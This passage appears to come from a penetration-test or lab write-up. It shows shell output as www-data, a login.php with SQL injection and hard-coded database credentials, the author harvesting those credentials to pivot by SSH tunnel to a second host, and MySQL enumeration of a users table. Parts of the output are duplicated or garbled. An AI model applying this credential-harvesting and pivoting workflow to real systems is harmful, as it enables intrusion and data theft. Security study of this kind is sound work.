    $ whoami
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    /sbin/ifconfig
    eth0 Link encap:Ethernet HWaddr fe:7f:29:91:70:e2
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:249 errors:0 dropped:0 overruns:0 frame:0
    TX packets:166 errors:0 dropped:0 overruns:0 carrier:0
    RX packets:119 errors:0 dropped:0 overruns:0 frame:0
    TX packets:62 errors:0 dropped:0 overruns:0 carrier:0

    // login.php (the $_POST keys were lost in extraction; 'username' and 'password' are assumed)
    $username = $_POST['username'];
    $password = $_POST['password'];
    // The database runs on a separate host and the credentials are hard-coded
    mysql_connect("192.168.2.200", "webapp", "webapp") or die(mysql_error());
    mysql_select_db("webapp") or die(mysql_error());
    // User input is interpolated into the query string unescaped
    $query = "SELECT * FROM users where username='$username' AND password='$password'";
    $result = mysql_query($query) or die(mysql_error());

Interesting, there is another box that handles the database. From login.php, I harvested some credentials. Let’s enable an SSH tunnel to access that second box.

    Server version: 5.5.37-0 wheezy1 (Debian)
    Copyright (c) 2000, 2014, Oracle and/or its affiliates.
    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    Type '\c' to clear the current input statement.

    | information_schema |
    | mysql |
    | performance_schema |
    | webapp |
    4 rows in set (0.01 sec)

    mysql> use webapp
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    | Tables_in_webapp |
    Ģ rows in set (0.00 sec)

    mysql> select * from users
    | username | password | dob | admin | id |